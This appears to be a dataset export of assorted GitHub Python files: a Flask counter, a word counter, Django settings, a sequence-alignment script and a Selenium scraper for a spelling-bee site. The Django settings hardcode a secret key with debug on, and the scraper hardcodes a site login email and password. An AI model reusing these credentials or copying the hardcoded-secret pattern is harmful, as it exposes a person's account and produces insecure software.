blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b92567f6fee076f85955d800f93fd648f213ee28
|
1afac76706254ad3a30329e7c20464404a350679
|
/app.py
|
57175e88d04132aead3c1b1395a79896062b2124
|
[] |
no_license
|
fmind/composed
|
85a06549dc94bdfa65847aef0e3dd9037331fdee
|
3cca3046ebfec35f1ecb295cb4b64661555ae423
|
refs/heads/master
| 2020-08-18T20:52:35.761875
| 2019-10-17T16:03:00
| 2019-10-17T16:03:00
| 215,832,577
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 532
|
py
|
#!/usr/bin/env python3
import time
import redis
from flask import Flask
app = Flask(__name__)
cache = redis.Redis(host='redis')
def get_hit_count():
retries = 5
while True:
try:
return cache.incr('hits')
except redis.exceptions.ConnectionError as exc:
if retries == 0:
raise exc
retries -= 1
time.sleep(0.5)
@app.route('/')
def hello():
count = get_hit_count()
return 'Hello Composed! I have been seen {} times.\n'.format(count)
|
[
"fmind@fmind.me"
] |
fmind@fmind.me
|
c0652561063de856a21b2cafab43f4a51934177e
|
8e12c5e91e6d3f1c3d69a80835315520f39890b9
|
/word_count.py
|
ac1f9be6faa4b6901d900af0904a312dfdcb8460
|
[] |
no_license
|
clemwek/word_count
|
d67840bbbc8bd26088c92ac54040652e85a4fea9
|
b6e11cbfa1daddfd815969d7bb165478e31a162a
|
refs/heads/master
| 2021-01-11T19:06:10.692564
| 2017-01-18T11:05:08
| 2017-01-18T11:05:08
| 79,317,221
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 578
|
py
|
"""word count"""
# recieve the text
# split to words and save in a list
# loop thro the list conting and saving the out
def words(words):
try:
words = words.split()
dic_out = {}
for word in words:
if word.isdigit():
if int(word) in dic_out:
dic_out[int(word)] = dic_out[int(word)]+1
else:
dic_out[int(word)] = 1
else:
if word in dic_out:
dic_out[word] = dic_out[word]+1
else:
dic_out[word] = 1
return dic_out
except Exception:
return 'invalid'
print(words("hello there we hello we are people from planet earth 1 2 2 3"))
|
[
"clemwek@gmail.com"
] |
clemwek@gmail.com
|
c4bb979e645dd69f594afabb966031af9569c2a5
|
210c10bd0abb34a50ace14a24df5f4071dbc3384
|
/xonsh_cripts/local/console.py
|
71acc0f2504ac1b82de194e1739b2114379470f7
|
[] |
no_license
|
MaximilianoRom7/mromay_bashrc
|
87618ed80f183287c7a13b911c7257b332f557c6
|
b06e6c83c5f0f32316c4b8cba58bc32685daab2b
|
refs/heads/master
| 2020-04-25T19:53:11.448806
| 2019-06-16T18:45:43
| 2019-06-16T18:45:43
| 173,036,193
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 655
|
py
|
def removeLastNewLine(text):
if text[-1] == "\n":
return text[:-1]
else:
return text
def pipeArgs(pipe):
if pipe:
return removeLastNewLine(pipe.read()).split(" ")
else:
return []
def printDict(d):
out = ""
if type(d) == dict:
for key, val in d.items():
out += str(key) + ": " + str(val) + "\n"
return out
else:
return str(d) + "\n"
def newline(func):
"""
CALLS THE ORIGINAL FUNCTION APPENDING A NEW LINE AT THE END
"""
def inner(args, pipe=None):
args += pipeArgs(pipe)
return printDict(func(*args)) + "\n"
return inner
|
[
"maximilianorom7@gmail.com"
] |
maximilianorom7@gmail.com
|
94a7fa977648e4a740cc016cecbbd3dc3a3494d6
|
a63b37bdb0359fe004362d20faac0cfbfb052444
|
/mysite/settings.py
|
700ed2f41905c21213bcd7e157f0022c588496c5
|
[] |
no_license
|
Psihiatr/my-first-blog
|
914522d49588f4a64d5e91111987fba4c0689879
|
e395cefbd736b0d58d18978845ec0a3ab7104cc8
|
refs/heads/master
| 2020-06-26T01:23:38.729972
| 2019-07-29T15:37:17
| 2019-07-29T15:37:17
| 199,481,267
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,197
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.0.13.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-t-)o4=7p94bs_o)ssj%l$d+7*5o9go!x*5yw9fltt(_67vbbj'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', '<pedch>.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'ru-ru'
TIME_ZONE = 'Europe/Kiev'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
[
"romapedchenko1997@gmail.com"
] |
romapedchenko1997@gmail.com
|
387948ecb79da7c39d86241dc6c3e02cbe8b89ea
|
fdedd2a4bae2199618d789c3e6ae4195bfae5f55
|
/empproject/testapp/models.py
|
0398b0c3413cc7d22b98827e77c80898852f655d
|
[] |
no_license
|
sai-goutham/jobs-local
|
ce59660ab00fecd0f08a17287f41c904c882b34e
|
2ea8be78295e45d989dc61c7d3c83d5a067cac9c
|
refs/heads/main
| 2023-04-17T07:47:33.848948
| 2021-04-30T06:38:38
| 2021-04-30T06:38:38
| 363,036,388
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 382
|
py
|
from django.db import models
# Create your models here.
class Employee(models.Model):
eno=models.IntegerField()
ename=models.CharField(max_length=30)
esal=models.FloatField()
eaddr=models.CharField(max_length=30)
objects=CustomManager()
class CustomManager(models.Manager):
def get_queryset(self):
return super().get_queryset().order_by('eno')
|
[
"saigowthambhuma@gmail.com"
] |
saigowthambhuma@gmail.com
|
a53dd3997037749bae7b10e90123e9fbcddead6d
|
67b0379a12a60e9f26232b81047de3470c4a9ff9
|
/hotline_old/urls.py
|
87b946473dd6f5a8a73078984128ef492880bb60
|
[] |
no_license
|
vintkor/whitemandarin
|
8ea9022b889fac718e0858873a07c586cf8da729
|
5afcfc5eef1bb1cc2febf519b04a4819a7b9648f
|
refs/heads/master
| 2021-05-06T03:35:09.367375
| 2017-12-20T15:43:08
| 2017-12-20T15:43:08
| 114,904,110
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 746
|
py
|
from django.conf.urls import include, url
from hotline import views as hotline_views
urlpatterns = (
# Examples:
url(r'lastscan/$', hotline_views.lastscan, name='lastscan'),
url(r'get_category/$', hotline_views.get_category, name='get_category'),
url(r'get_category_data/$', hotline_views.get_category_data, name='get_category_data'),
url(r'scan_it/$', hotline_views.scan_it, name='scan_it'),
url(r'get_status/$', hotline_views.get_status, name='get_status'),
url(r'^savecat/(?P<id>[0-9]+)/$', hotline_views.savecat, name='savecat'),
url(r'^getprice/(?P<id>[0-9]+)/$', hotline_views.getprice, name='getprice'),
url(r'^get_not_active/(?P<id>[0-9]+)/$', hotline_views.get_not_active, name='get_not_active'),
)
|
[
"alkv84@yandex.ru"
] |
alkv84@yandex.ru
|
f38f7c7bd758efb2608a137557708d280f3b3a87
|
d21c79c997ff3ac033fe5fc5e5a646134dd920e8
|
/demo/utils/get_img.py
|
e41a9651a84080377da4d67ae547eb9b2b98b55b
|
[] |
no_license
|
xinghanggogogo/scrapy_auto_proxy
|
cbc67dacc21974c172fb2071eaea56d87069669f
|
a7f7b76267f37c12613ab47181988609eb98bc78
|
refs/heads/master
| 2021-01-11T18:11:38.124993
| 2017-01-20T03:11:26
| 2017-01-20T03:11:26
| 79,511,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 766
|
py
|
#-*- coding: utf-8 -*-
import os
import uuid
import urllib2
import cookielib
import requests
import re
import urllib
from demo.models.ebookmodel import *
img_path="/home/xinghang/spider/"
def get_img_extend_name(img_url):
img_url = img_url.strip()
extend_name = '.' + img_url.split('.')[-1]
return extend_name
books_info = ebookModel.select()
for book_info in books_info:
try:
img_url = book_info.img_url
img_name = book_info.isbn13
print img_url, img_name
extend_name = get_img_extend_name(img_url)
r = requests.get(img_url,stream=True)
with open(img_path+img_name+extend_name, 'wb') as fd:
for chunk in r.iter_content():
fd.write(chunk)
except:
pass
|
[
"xinghang@thunder.com.cn"
] |
xinghang@thunder.com.cn
|
ccc6cddcf213e8e4bbaaeb32c2c9f8a65707c579
|
1b4816806c16e329e0a6a2a38ce770df796badfe
|
/AffineGap.py
|
da7cfabd55b83f0c74e7f370fab7c49152e9a61e
|
[] |
no_license
|
XueningHe/Rosalind_Sequence_Alignment
|
45e68c97353c9796c321a0e6aa37c4c2a06dcfcd
|
c0fbc444d4110670fc66f1a18605fb9d01bfb4b7
|
refs/heads/master
| 2022-04-22T01:02:46.212911
| 2020-04-28T03:46:10
| 2020-04-28T03:46:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,225
|
py
|
import numpy as np
scorelist=[]
with open("BLOSUM62.txt","r") as f:
aalist=f.readline().split()
for line in f:
scorelist.append(list(map(int,line.split()[1:])))
substitutionmatrix=np.array(scorelist)
scoredict=dict()
for i in range(len(aalist)):
for j in range(i,len(aalist)):
scoredict[(aalist[i],aalist[j])]=substitutionmatrix[i][j]
scoredict[(aalist[j],aalist[i])]=substitutionmatrix[i][j]
def AffineGapAlignment(peptide1,peptide2,gapopen,gapextension):
lengthpeptide1=len(peptide1)
lengthpeptide2=len(peptide2)
tracebackl=np.zeros(shape=(lengthpeptide1+1,lengthpeptide2+1))
tracebackm=np.zeros(shape=(lengthpeptide1+1,lengthpeptide2+1))
tracebacku=np.zeros(shape=(lengthpeptide1+1,lengthpeptide2+1))
lengthpeptide1=len(peptide1)
lengthpeptide2=len(peptide2)
lower=np.zeros(shape=(lengthpeptide1+1,lengthpeptide2+1))
middle=np.zeros(shape=(lengthpeptide1+1,lengthpeptide2+1))
upper=np.zeros(shape=(lengthpeptide1+1,lengthpeptide2+1))
lower[0][0]=np.nan
upper[0][0]=np.nan
for i in range(1,lengthpeptide1+1):
middle[i][0]=-gapopen-(i-1)*gapextension
tracebackm[i][0]=23
lower[i][0]=-gapopen-(i-1)*gapextension
tracebackl[i][0]=13
upper[i][0]=np.nan
for j in range(1,lengthpeptide2+1):
middle[0][j]=-gapopen-(j-1)*gapextension
tracebackm[0][j]=22
upper[0][j]=-gapopen-(j-1)*gapextension
tracebacku[0][j]=32
lower[0][j]=np.nan
for i in range(1,lengthpeptide1+1):
for j in range(1,lengthpeptide2+1):
if not np.isnan(lower[i-1][j]):
lower[i][j]=max(lower[i-1][j]-gapextension,middle[i-1][j]-gapopen)
if lower[i][j]==lower[i-1][j]-gapextension:
tracebackl[i][j]=13
else:
tracebackl[i][j]=14
else:
lower[i][j]=middle[i-1][j]-gapopen
tracebackl[i][j]=14
if not np.isnan(upper[i][j-1]):
upper[i][j]=max(upper[i][j-1]-gapextension,middle[i][j-1]-gapopen)
if upper[i][j]==upper[i][j-1]-gapextension:
tracebacku[i][j]=32
else:
tracebacku[i][j]=34
else:
upper[i][j]=middle[i][j-1]-gapopen
tracebacku[i][j]=34
middle[i][j]=max(lower[i][j],upper[i][j],middle[i-1][j-1]+scoredict[(peptide1[i-1],peptide2[j-1])])
if middle[i][j]==lower[i][j]:
tracebackm[i][j]=23
elif middle[i][j]==upper[i][j]:
tracebackm[i][j]=22
else:
tracebackm[i][j]=21
return (lower,middle,upper,tracebackl,tracebackm,tracebacku)
def TraceBack(peptide1,peptide2,gapopen,gapextension):
matrices=AffineGapAlignment(peptide1,peptide2,gapopen,gapextension)
lower=matrices[0]
middle=matrices[1]
upper=matrices[2]
tracebackl=matrices[3]
tracebackm=matrices[4]
tracebacku=matrices[5]
lengthpeptide1=len(peptide1)
lengthpeptide2=len(peptide2)
i=lengthpeptide1
j=lengthpeptide2
alignedpeptide1=[]
alignedpeptide2=[]
finalscore=max(lower[lengthpeptide1][lengthpeptide2],middle[lengthpeptide1][lengthpeptide2],upper[lengthpeptide1][lengthpeptide2])
if finalscore==lower[lengthpeptide1][lengthpeptide2]:
workingtracematrix=tracebackl
elif finalscore==middle[lengthpeptide1][lengthpeptide2]:
workingtracematrix=tracebackm
else:
workingtracematrix=tracebacku
while i or j:
if workingtracematrix[i][j]==13:
alignedpeptide1.insert(0,peptide1[i-1])
alignedpeptide2.insert(0,"-")
i-=1
elif workingtracematrix[i][j]==14:
alignedpeptide1.insert(0,peptide1[i-1])
alignedpeptide2.insert(0,"-")
workingtracematrix=tracebackm
i-=1
elif workingtracematrix[i][j]==21:
alignedpeptide1.insert(0,peptide1[i-1])
alignedpeptide2.insert(0,peptide2[j-1])
i-=1
j-=1
workingtracematrix=tracebackm
elif workingtracematrix[i][j]==32:
alignedpeptide1.insert(0,"-")
alignedpeptide2.insert(0,peptide2[j-1])
j-=1
elif workingtracematrix[i][j]==34:
alignedpeptide1.insert(0,"-")
alignedpeptide2.insert(0,peptide2[j-1])
workingtracematrix=tracebackm
j-=1
elif workingtracematrix[i][j]==22:
workingtracematrix=tracebacku
elif workingtracematrix[i][j]==23:
workingtracematrix=tracebackl
else:
print("There seems to be a problem at",i,j,"with value:",workingtracematrix[i][j],"in this matrix:",workingtracematrix)
return
return (str(int(finalscore)),"".join(alignedpeptide1),"".join(alignedpeptide2))
with open("data.txt","r") as f:
content=f.read().split()
peptide1=content[0]
peptide2=content[1]
gapopen=11
gapextension=5
results=TraceBack(peptide1,peptide2,gapopen,gapextension)
print("For gap extension as",gapextension)
for item in results:
print(item)
|
[
"noreply@github.com"
] |
XueningHe.noreply@github.com
|
cdea4de127fe453c1325d0c9fd2518239edddce5
|
d403a80caa0290c8b4584ecc641e04ac786706b9
|
/spelling-bee/download_spellpundit_collection.py
|
967fe0d8ea71dd0c668298a38376268fda6f48ec
|
[] |
no_license
|
ditojohn/py3-raspi
|
8a0ddec568db3b3789a03c88f29e14103e0eb603
|
01dee7631206277c963d7d946d318b2980452532
|
refs/heads/master
| 2023-04-17T04:46:09.191497
| 2021-05-02T20:04:10
| 2021-05-02T20:04:10
| 228,090,372
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,301
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
import urllib3
from bs4 import BeautifulSoup
import traceback
sys.path.insert(0, "..")
import common.rpimod.stdio.input as cinput
import common.rpimod.stdio.output as coutput
import common.rpimod.stdio.fileio as cfile
# Set to True to turn debug messages on
#APP_DEBUG_MODE_ENABLED = True
APP_DEBUG_MODE_ENABLED = False
################################################################
# Configuration variables
################################################################
APP_SOURCE_ID = "spell-pundit"
APP_SOURCE_DESC = "SpellPundit"
APP_SOURCE_URL = "https://www.spellpundit.com/spell/index.php"
APP_DATA_DIR = "data/download/spellpundit/"
# Vocabulary
APP_MODULE_ID = "001"
APP_MODULE_TYPE = "homonyms" # Set to module type: "roots", "spelling", "vocab"
APP_NAVIGATE_MENU = "Homonyms>Homonyms Module"
APP_MODULE_NM = "homonyms" #"vocab-01-easy-intermed"
APP_COLLECTION_CATEGORY = "Homonyms" # Set to module type: "roots", "spelling", "vocab"
# Set to empty list as default to select all sets
APP_SELECT_SET_LIST = []
# Set to name of first list as default to select all sets
APP_START_SET_NM = "set-03" #"set-09"
# Set to empty string as default to select all sets
APP_STOP_SET_NM = ""
# ToDo : Support for lists of modules
APP_MODULE_LIST = [
{
"id": "",
"type": "",
"name": "spelling-contest-spandana-2019-junior",
"menu": "Spelling>Spandana Spelling Bee Modules>2019 Spandana Junior Spelling List Words Module",
"selectList": [],
"startSet": "",
"stopSet": ""
}
]
# Fast
APP_INIT_WAIT_DELAY = 4
APP_TIMEOUT_WAIT_DELAY = 6
APP_WAIT_DELAY = 1
APP_SLEEP_DELAY = 1
# Medium
APP_INIT_WAIT_DELAY = 4.5
APP_TIMEOUT_WAIT_DELAY = 8
APP_WAIT_DELAY = 1.5
APP_SLEEP_DELAY = 2
# Slow
APP_INIT_WAIT_DELAY = 5
APP_TIMEOUT_WAIT_DELAY = 10
APP_WAIT_DELAY = 3
APP_SLEEP_DELAY = 4
################################################################
# Application Directories
################################################################
APP_LIST_DIR = APP_DATA_DIR + "list/"
APP_DICT_DIR = APP_DATA_DIR + "dict/"
################################################################
# Application Files
################################################################
APP_LIST = "spelling_bee_{SOURCE}-{MODULE_ID}-{MODULE_NM}-{SET_ID}-wordset.txt"
APP_LIST_ERROR = "spelling_bee_{SOURCE}-{MODULE_ID}-{MODULE_NM}-{SET_ID}-wordset.err"
APP_DICT_ENTR = "sb_{WORD}.dat"
APP_DICT_CLIP = "sb_{WORD}.mp3"
################################################################
# Internal Variables
################################################################
APP_USER_AGENT = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'}
APP_NEWLINE = "\n"
APP_EMPTY_STRING = ""
APP_WORD_DELIMITER = ";"
################################################################
# Configure Selenium Chrome Webdriver
# Reference:
# https://www.quora.com/How-do-I-install-Selenium-in-Python-on-a-Linux-environment
# https://christopher.su/2015/selenium-chromedriver-ubuntu/
# https://stackoverflow.com/questions/50642308/webdriverexception-unknown-error-devtoolsactiveport-file-doesnt-exist-while-t
# https://stackoverflow.com/questions/59186984/selenium-common-exceptions-sessionnotcreatedexception-message-session-not-crea
################################################################
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
chrome_options = Options()
#chrome_options.add_argument("start-maximized") # open Browser in maximized mode
chrome_options.add_argument("disable-infobars") # disabling infobars
chrome_options.add_argument("--disable-extensions") # disabling extensions
chrome_options.add_argument("--disable-gpu") # applicable to windows os only
chrome_options.add_argument("--disable-dev-shm-usage") # overcome limited resource problems
chrome_options.add_argument("--no-sandbox") # bypass OS security model -- Addresses unknown error: DevToolsActivePort file doesn't exist
chrome_options.add_argument('--headless') # run in headless mode -- in case of chromedriver compatibility issues
chrome_options.add_argument('window-size=1920x1480')
chrome_options.add_argument("--mute-audio") # mute audio
browser = webdriver.Chrome(chrome_options=chrome_options)
################################################################
# Configure Connection Pool
################################################################
connectionPool = urllib3.PoolManager(5, headers=APP_USER_AGENT)
################################################################
# Application
################################################################
def exit_app(exitCode=0):
# Close browser session
browser.close()
# Resume input from stdin
cinput.set_term_input(True)
# Exit
exit(exitCode)
# Open new session in browser
while True:
try:
wait = WebDriverWait(browser, APP_INIT_WAIT_DELAY)
browser.get(APP_SOURCE_URL)
#browser.save_screenshot('download_spellpundit_module-output-001.png')
userBox = wait.until(EC.presence_of_element_located((By.NAME, 'user')))
print("Sending Username...")
userBox.send_keys("dito.john@gmail.com")
time.sleep(APP_WAIT_DELAY)
passBox = wait.until(EC.presence_of_element_located((By.NAME, 'passwd')))
print("Sending Password...")
passBox.send_keys("karukutty")
time.sleep(APP_WAIT_DELAY)
print("Logging in...")
browser.find_element_by_xpath("//button[text()='Sign in']").click()
time.sleep(APP_SLEEP_DELAY)
print("\nHome URL: " + browser.current_url)
print("Navigating to menu for module {SOURCE}/{MODULE_ID}-{MODULE_NM}...".format(SOURCE=APP_SOURCE_ID, MODULE_ID=APP_MODULE_ID, MODULE_NM=APP_MODULE_NM))
for menuItem in APP_NAVIGATE_MENU.split('>'):
print("Navigating to menu item: {}".format(menuItem))
browser.find_element_by_link_text(menuItem).click()
time.sleep(APP_WAIT_DELAY)
print("\nFetching module meta-info ...")
print("Module URL: " + browser.current_url)
moduleTitle = browser.find_element_by_xpath("//div[@class='panel-heading']").text
moduleTableElement = browser.find_element_by_xpath("//div[@class='table-responsive']")
# Break loop if try is successful
break
except Exception as e:
# Displays the trace for the error
coutput.print_err(traceback.format_exc())
exceptionName = type(e).__name__
if exceptionName == "TimeoutException":
coutput.print_warn("Connection timeout. Waiting for {}s ...".format(APP_TIMEOUT_WAIT_DELAY))
time.sleep(APP_TIMEOUT_WAIT_DELAY)
else:
exit_app(1)
# Retrieve sets from module
setRowElements = moduleTableElement.find_elements_by_xpath("//table/tbody/tr")
setCounter = 0
setEntries = []
processFlag = False
for setRowElement in setRowElements:
setCounter = setCounter + 1
setColElement = setRowElement.find_element_by_xpath(".//td")
setName = setColElement.text.strip().lower().replace(" ", "-")
setID = "{:03d}-".format(setCounter) + setName
setURL = setRowElement.find_element_by_xpath(".//a[contains(@href,'&bt=r') and not(contains(@href,'_test_'))]").get_property("href")
print("Checking set {}.".format(setName))
coutput.print_watcher("setID")
coutput.print_watcher("setURL")
if len(APP_SELECT_SET_LIST) > 0:
if setName in APP_SELECT_SET_LIST:
processFlag = True
else:
processFlag = False
else:
if APP_START_SET_NM == APP_EMPTY_STRING:
processFlag = True
elif setName == APP_START_SET_NM:
processFlag = True
if setName == APP_STOP_SET_NM:
processFlag = False
if processFlag is False:
print("Set {} marked for exclusion. Skipping.".format(setName))
else:
print("Set {} marked for processing.".format(setName))
setEntries.append({"id" : setID, "name" : setName, "url" : setURL})
print("\nModule Label: " + moduleTitle)
print("Sets marked for processing:")
for setEntry in setEntries:
print(setEntry)
userInput = cinput.get_keypress("\nPlease review sets and press any key when ready ... ")
# Iterate through sets from module
for setEntry in setEntries:
print("\nSet URL: " + setEntry["url"])
while True:
try:
browser.get(setEntry["url"])
print("\nInitializing list and error files ...")
APP_LIST_FILE = APP_LIST_DIR + cfile.cleanse_filename(APP_LIST.format(SOURCE=APP_SOURCE_ID, MODULE_ID=APP_MODULE_ID, MODULE_NM=APP_MODULE_NM, SET_ID=setEntry["id"]))
print("Word List: " + APP_LIST.format(SOURCE=APP_SOURCE_ID, MODULE_ID=APP_MODULE_ID, MODULE_NM=APP_MODULE_NM, SET_ID=setEntry["id"]))
if os.path.isfile(APP_LIST_FILE) and os.path.getsize(APP_LIST_FILE) > 0:
print("List file {} exists. Deleting...".format(APP_LIST_FILE))
cfile.delete(APP_LIST_FILE)
APP_LIST_ERROR_FILE = APP_LIST_DIR + cfile.cleanse_filename(APP_LIST_ERROR.format(SOURCE=APP_SOURCE_ID, MODULE_ID=APP_MODULE_ID, MODULE_NM=APP_MODULE_NM, SET_ID=setEntry["id"]))
if os.path.isfile(APP_LIST_ERROR_FILE) and os.path.getsize(APP_LIST_ERROR_FILE) > 0:
print("List error file {} exists. Deleting...".format(APP_LIST_ERROR_FILE))
cfile.delete(APP_LIST_ERROR_FILE)
# Break loop if try is successful
break
except Exception as e:
# Displays the trace for the error
coutput.print_err(traceback.format_exc())
exceptionName = type(e).__name__
if exceptionName == "TimeoutException":
coutput.print_warn("Connection timeout. Waiting for {}s ...".format(APP_TIMEOUT_WAIT_DELAY))
time.sleep(APP_TIMEOUT_WAIT_DELAY)
else:
exit_app(1)
while True:
try:
print("\nFetching word meta-info ...")
headInfoElement = browser.find_element_by_css_selector(".col-sm-9.col-md-9").find_element_by_css_selector(".panel-heading")
moduleName = headInfoElement.find_element_by_tag_name("a").text
wordInfoElement = browser.find_element_by_xpath("//form[contains(@name,'moduleform')]")
moduleID = wordInfoElement.find_element_by_id("module_id").get_property("value")
wordID = wordInfoElement.find_element_by_xpath("//*[contains(@id,'_id')]").get_property("value")
bodyInfoElement = wordInfoElement.find_element_by_xpath("//div[@class='table-responsive']/table/thead")
reMatch = re.search("(.*)[ ]+(?:Root|Word|Vocabulary Word|Homonym)[ ]+(\d+)[ ]+of[ ]+(\d+).*", bodyInfoElement.text, flags=re.M)
wordIndex = reMatch.group(2).strip() + "/" + reMatch.group(3).strip()
reMatch = re.search("https://.*/\?mode=(\w+).*", setEntry["url"], flags=re.M)
mode = reMatch.group(1).strip()
print("\n>>>>>>>>>> {} Fetching entry rows ...".format(wordIndex))
entryRows = browser.find_elements_by_xpath("//div[@class='table-responsive']/table/tbody/tr")
setWord = APP_COLLECTION_CATEGORY
for row in entryRows:
entryCols = row.find_elements_by_tag_name("td")
if len(entryCols) == 0:
continue
elif len(entryCols) != 7:
cfile.append(APP_LIST_ERROR_FILE, "Unexpected Columns:{}:{}".format( len(entryCols), row.text.strip()) )
continue
displayWord = ''
listWord = ''
keyWord = ''
wordMeta = ''
wordRespelling = ''
wordAudioURL = ''
wordFuncLabel = ''
wordEtymology = ''
wordDefinition = ''
wordExamples = ''
wordNote = ''
wordSentence = ''
wordRelated = ''
wordEntry = ''
displayWord = entryCols[0].text.strip()
listWord = re.sub('[ ;,]+(also|or|oe|plural)[ ;,]+', APP_WORD_DELIMITER, displayWord, flags=re.IGNORECASE)
listWord = re.sub('-(also|or|oe|plural)[, ]+', '-' + APP_WORD_DELIMITER, listWord, flags=re.IGNORECASE)
listWord = re.sub(',[; ]+', APP_WORD_DELIMITER, listWord, flags=re.IGNORECASE)
listWord = listWord.strip()
keyWord = re.sub(';.*', APP_EMPTY_STRING, listWord, flags=re.IGNORECASE).replace(" ", "_").lower().strip()
wordMeta = 'Mode={};ModuleName={};ModuleID={};SetName={};SetID={};WordIndex={};WordID={};KeyWord={};DisplayWord={}'.format(mode,moduleName,moduleID,setEntry["name"],setEntry["id"],wordIndex,wordID,keyWord,displayWord)
setWord = setWord + "|" + listWord
audioElement = entryCols[1].find_element_by_xpath(".//audio[contains(@id,'audio')]")
if audioElement is not None:
wordAudioURL = audioElement.get_property("src")
wordRespelling = entryCols[2].text.strip()
wordRespelling = "\\{}\\".format(wordRespelling)
wordFuncLabel = entryCols[3].text.strip()
wordEtymology = entryCols[4].text.strip()
wordDefinition = entryCols[5].text.strip()
if entryCols[6].text.strip() != "":
cfile.append(APP_LIST_ERROR_FILE, "Unexpected Value:{}:{}".format( 6, entryCols[6].text.strip()) )
continue
wordEntry = "#!Source: " + APP_SOURCE_DESC
wordEntry = wordEntry + APP_NEWLINE + "#!Word: " + listWord
wordEntry = wordEntry + APP_NEWLINE + "#!Respelling: " + wordRespelling
wordEntry = wordEntry + APP_NEWLINE + "#!AudioURL: " + wordAudioURL
wordEntry = wordEntry + APP_NEWLINE + "#!Etymology: " + wordEtymology
wordEntry = wordEntry + APP_NEWLINE + "#!Sentence: " + wordSentence
wordEntry = wordEntry + APP_NEWLINE + "#!Note: " + wordNote
wordEntry = wordEntry + APP_NEWLINE + "#!Meta: " + wordMeta
wordEntry = wordEntry + APP_NEWLINE + "#!Examples: " + wordExamples
wordEntry = wordEntry + APP_NEWLINE + "#!Related: " + wordRelated
wordEntry = wordEntry + APP_NEWLINE + "({}) {}".format(wordFuncLabel, wordDefinition)
print("\nEntry for {}: ".format(displayWord))
print(wordEntry)
print(APP_EMPTY_STRING)
APP_DICT_ENTR_FILE = APP_DICT_DIR + cfile.cleanse_filename(APP_DICT_ENTR.format(WORD=listWord))
if os.path.isfile(APP_DICT_ENTR_FILE) and os.path.getsize(APP_DICT_ENTR_FILE) > 100:
print("Definition file {} exists. Skipping.".format(APP_DICT_ENTR_FILE))
else:
print("Creating definition file: " + APP_DICT_ENTR_FILE)
